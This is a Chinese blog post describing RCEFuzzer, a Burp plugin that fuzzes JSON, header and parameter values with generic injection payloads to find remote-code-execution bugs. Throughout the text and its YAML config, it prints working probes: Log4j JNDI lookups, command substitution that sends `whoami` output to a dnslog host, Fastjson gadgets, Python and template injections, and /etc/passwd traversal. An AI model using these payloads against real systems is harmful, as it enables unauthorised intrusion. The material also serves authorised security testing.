RCEFuzzer - 被动扫描与fuzz上一些思路的实现

写在前面

1. 这是大概三年前的版本，基本已经停止维护，除非严重 Bug 外不考虑更新。

2. 这个版本是以 Burp 插件的形式存在，新版本是独立的系统，仅在 JJ Team 开放使用。

3. 仅开放 Release 版本作为交流学习使用， jar 没做混淆，实际上和放代码差别不大，作为交流学习使用我认为足够了，拿着源代码做细微调整意义不大，研究学习建议重构。

4. 欢迎交流学习～

工具地址

https://github.com/TheKingOfDuck/RCEFuzzer

基础介绍

这是一个以 fuzz 为中心思想的被动扫描工具，多数扫描器的工作逻辑是以已知漏洞去冲目标，然后根据条件判断是否存在这个已知的漏洞；RCEFuzzer 的工作逻辑是以通用 payload 去污染目标的参数，然后根据条件判断是否存在未知漏洞。

举个例子，假设被动收集到的流量是：

`POST /sys/customer/list HTTP/1.1``Host: www.baidu.com``Content-Length: 23``Content-Type: application/json;charset=UTF-8``   ``{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}`

如果配置了三条通用的 payload ：

`${jndi:ldap://dnslog/log4j}``` `whoami`.dnslog ```{"@type":"java.net.Inet4Address","val":"dnslog"}`

那么 RCEFuzzer 的参数污染模块将对目标发起以下请求：

污染 key1 的值然后分别发包
污染 key2 的值然后分别发包
尝试自动解码 key2 ，并污染子 JSON 的 innerkey1 的值然后分别发包
污染 key3 的值然后分别发包。
污染 key3 的子 JSON 的 innerkey2 的值，然后分别发包。
尝试解析 innerkey2 ，并污染子JSON的 k3 的值然后分别发包

理论上总的请求量是 3*6=18 次。这仅是参数污染模块，如果带上其他模块，那请求量可能是 50 。如果 payload 写得多点，原流量大一点，那么可能是 5000 次。

流量过大注定他没法在常规日站的场景使用，给目标写入一堆脏数据，那就得不偿失了。

对自己日常自己跑起来要挖洞的系统，测试类环境的系统就无所谓。

资产去重

上面提到流量会非常大，选出需要污染的流量就尤为重要，降低扫描基数，扫描流量也将大幅下降，那么在这个方向上我做了哪些尝试呢：重点参考

https://blog.thekingofduck.com/post/url-normalize-in-passive-scan/

除最基本的静态资源去重外，这里面还提到了关于 urlpath 、 query 等的处理的思路，但是不够完全，细心一点的会发现上文中提到的流量：

{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}

这里面的 id 和 isLogin 是没有污染的，因为大部分后端语言都会定义好参数类型，对于整数型、布尔型的参数没有太大污染的必要，徒增报错罢了，除此之外流量中常见 uuid 、hash 等常见格式的值也会跳过污染，进一步缩减流量。

这里需要单独再提一下，实践中有很多确认是重复的，比如：

`/order/S09834FVD``/order/S07C34FDCCVX`

显然两条流量对应了同一后端，是重复的，没必要都扫，但他没有像 uuid 或 md5 一样的固定特征，正则没法解决，看到一些同行的解决方案是上大模型去识别，颇有种工作饱和了没事干的感觉，本质上是区分文本是否为随机的，即将文本分为是否随机两种类型，业界有非常多成熟的文本分类模型训练教程，现成的模型，不用 GPU 就可以快速解决问题。

扫描模块

开放的版本中功能覆盖的有限，仅简单介绍一些思路。核心逻辑是递归追加/替换污染，对嵌套的 from-data 、json 、xml 、soap 等进行自动解码、污染、再编码。

JSON 污染

对 JSON 污染我个人理解分为以下两类：

键值污染：对于字符串类型的键值进行增加或替换的污染，除了污染成正常的资产 payload 之外，还可污染成 python 的结构体。
替换污染：对整个 JSON 进行替换，换成指定的 payload ，这里主要针对 FastJson 这样的漏洞。

具体一点的例子：

{"innerkey1":"innervalue1"}

可以污染成：

`{"innerkey1":__import__('socket').gethostbyaddr('dnslog')}` `{"innerkey1":"${jndi:ldap://dnslog/jsonkey}"}` `{"innerkey1":"innervalue1","@type":"java.net.Inet4Address","val":"dnslog"}` `{"innerkey1":{"@type":"java.net.Inet4Address","val":"dnslog"}}` `{"@type":"java.net.Inet4Address","val":"dnslog"}`

几种漏洞类型都挺常见的。

header 污染

和JSON污染一样：

键值污染：对 header 键值进行增加或替换的污染。
替换污染：对所有 header 的键值污染成指定 payload 。

举个例子：

`GET / HTTP/1.1``Host: www.baidu.com``Accept-Encoding: gzip, deflate``Accept: */*``Accept-Language: en-US;q=0.9,en;q=0.8``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36``Connection: close``Cache-Control: max-age=0``   ``   `

可以污染成

`GET / HTTP/1.1``Host: www.baidu.com``Accept-Encoding: gzip, deflate``Accept: */*``Accept-Language: en-US;q=0.9,en;q=0.8``User-Agent: ${jndi:ldap://dnslog/jsonkey}``Connection: close``Cache-Control: max-age=0```X-Forwarded-For: `whoami`.dnslog```X-Api-Version: ${jndi:dns://dnslog/456}``   ``   `

像 Host 、Connection 、Content-Type 这类 header 应该跳过污染，避免对请求本身造成影响，一次性替换全部 header 的键值这种纯粹是为了 log4j 这种 payload 打过去省事，暴力出奇迹。

参数污染

JSON 场景下一般就嵌套下转义后或编码后的 JSON ，但 form-data 表单中有非常多出现嵌套其他类型数据的情况，比如参数中嵌套 JSON ，嵌套 XML ，从某些 OA 中能够看出研发为了兼容做的不少 🐂 事。

同样分为两种模式：

替换污染：常规的命令注入、SQL 注入等等
追加污染：后端带判断类的，如校验传入值包含指定字符串时，追加模式将会非常管用。

还是举个例子：

https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9

可以污染成：

`https://www.baidu.com/admin/load?host=dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9``https://www.baidu.com/admin/load?host=127.0.0.1@dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9``https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJgd2hvYW1pYC5kbnNsb2cifQ==``...`

为什么要做追加模式在第二个 case 中就可以看出。

SSRF

代码抄自：

https://github.com/ethicalhackingplayground/ssrf-king

作者基本覆盖了常见代码产生的 SSRF 和配置错误导致的 SSRF ，非常受用。这里只是封装了嵌套解析，其他改动不大。

其他模块

还有很多了其他模块，如响应匹配、文件上传污染、SOAP 请求污染等，但并未在该版本中实现，不再一一介绍。

使用技巧

需要有配套的dnslog：

`https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEY``https://admin.xxxx.com/logs?token=xxxxxx&type=http&q=KEY`

KEY 是占位符，不能改动其他无所谓。

配置文件如下：

`###``#``# 配置说明:``#    1.tweb的配置是必须要改的, 不改显示不了漏洞``#    2.白名单的优先级是高于黑名单的``#    3.所有配置都是可以动态改的, 不用重新加载插件``# 使用说明:``#    https://www.wolai.com/gS5UWgMmHG4ynJQgzL3AYk``###``config:`  `version: |  # 插件版本`    `0.5`  `twebdomain: | # tweb 子域名配置`    `xxx.xx.com`  `twebapi: |  # tweb api配置 其中KEY为展位符,在新旧版本的tweb均可在Profile页面找到`    `https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEY`  `timeout: |  # 扫描过程中的超时配置 非tweb请求超时设置 单位毫秒 60000为60秒`    `60000`  `hostBlacklistReg: |  # 禁止扫描的域名列表`    `(.+?)(gov\.cn|edu\.cn|tweb|google|gstatic)(.+?)`  `extBlacklist: |  # 禁止扫描的后缀列表,这不是正则，本来想从passive-scan-client中抄代码的,结果发现他有bug...`    `.js|.css|.jpeg|.gif|.jpg|.png|.pdf|.rar|.zip|.docx|.doc|.ico``   ``jsonPollution:`  `status:  #on为开启 off为关闭`    `on`  `allin: | #替换整个json数据包`    `{"@type":"java.net.Inet4Address","val":"dnslog"}`  `value: | #仅污染json的键值 为了python eval那种情况考虑 不加双引号包裹的话污染结果类似{"test":__import__('os')} {"test":"{\"dtaa\":__import__('os')}"}`    `"${jndi:ldap://dnslog/jsonkey}"`    `__import__('socket').gethostbyaddr('dnslog')``   ``paramPollution:`  `status: #on为开启 off为关闭`    `on`  `exprs: | #为了兼容有回显的表达式注入/代码执行漏洞`    `{{9527*2333}}|22226491`    `${T(java.lang.System).getenv()}|JAVA_HOME`    `${T+++++++(java.lang.System).getenv()}|JAVA_HOME`    `{php}var_dump(md5(9527));{/php}|52569c045dc348f12dfc4c85000ad832`    `{if+var_dump(md5(9527))}{/if}|52569c045dc348f12dfc4c85000ad832`    `../../../../../../../../../../../../../../../etc/passwd|root`  `value: |`    `dnslog`    `${jndi:ldap://paramPollution.dnslog/log4j}`    `` `whoami`.dnslog ``    `http://dnslog/`    `ping+-nc+1+dnslog``   ``headerPollution:`  `status: #on为开启 off为关闭`    `on`  `allin: | #一次性污染除了url和host外的所有请求头`    `${jndi:dns://dnslog/456}`    `${jndi:ldap://dnslog/789}`  `headers: | #添加的请求头如果原数据包有则追加原值污染 无则添加后再发包 竖线|为key和value的分隔符号。`    `X-Forwarded-For|${jndi:dns://dnslog/456}`    `X-Api-Version|${jndi:dns://dnslog/456}``   ``ssrfPollution:`  `status: #on为开启 off为关闭`    `on``   ``responseMatch:`  `status: #on为开启 off为关闭`    `off`  `expr: | #添加的请求头如果原数据包有则覆盖原值污染 无则添加后再发包`    `thinkphp:error`

参数污染中 exprs 部分的配置以 | 作为切割，区分请求和响应，用于回显漏洞的检测。tweb 处配置 dnslog 的子域名和 api 查询的 url 即可。

写在最后

RCEFuzzer 在实践中直接或间接的为我贡献了几十个的 RCE ，不少系统通过点点就可轻易收割漏洞点，进而撕开口子，拿到代码，进一步审计得到更有价值的洞，是生产漏洞的重要一环，也希望能为各位贡献新的RCE！

最后的最后，特别要提的是 RCEFuzzer 中不少思路都来源于 c26root （即大 6 老师）的指点，大 6 老师才是真正的神，大 6 老师🐮🍺！

长亭百川云 - 文章详情

长亭百川云

长亭百川云 - 文章详情

长亭百川云

RCEFuzzer - 被动扫描与fuzz上一些思路的实现